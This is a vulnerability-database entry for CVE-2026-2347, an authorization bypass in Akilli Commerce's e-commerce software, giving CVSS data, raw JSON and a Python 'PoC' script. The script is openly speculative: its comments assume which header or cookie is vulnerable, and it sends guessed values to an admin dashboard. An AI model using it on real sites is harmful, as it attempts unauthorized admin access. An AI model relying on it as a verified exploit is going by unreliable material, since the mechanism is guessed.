Security Vulnerability Report
中文
CVE-2026-2347 CVSS 9.8 CRITICAL

CVE-2026-2347

Published: 2026-05-14 10:16:19
Last Modified: 2026-05-14 16:20:13

Description

Authorization bypass through User-Controlled key vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows Session Hijacking. This issue affects E-Commerce Website: before 4.5.001.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Akilli Commerce E-Commerce Website < 4.5.001

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-2347 PoC: Authorization Bypass via User-Controlled Key # Target: Akilli Commerce E-Commerce Website < 4.5.001 target_url = "http://target-site.com/admin/dashboard" # The vulnerability allows bypassing auth via a user-controlled key. # This could be a specific header, cookie, or parameter. # Example: Manipulating the session cookie or authorization header. headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", # Assuming the 'auth_key' header is the vulnerable user-controlled key "auth_key": "admin_bypass_key" } cookies = { # Or via session ID manipulation "session_id": "attacker_controlled_session_payload" } try: response = requests.get(target_url, headers=headers, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") if "Dashboard" in response.text or "Admin" in response.text: print("[+] Potential Authorization Bypass Successful! Admin access gained.") else: print("[-] Bypass failed, admin content not found.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2347", "sourceIdentifier": "[email protected]", "published": "2026-05-14T10:16:19.203", "lastModified": "2026-05-14T16:20:13.477", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization bypass through User-Controlled key vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows Session Hijacking.\n\nThis issue affects E-Commerce Website: before 4.5.001."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0222", "source": "[email protected]"}]}}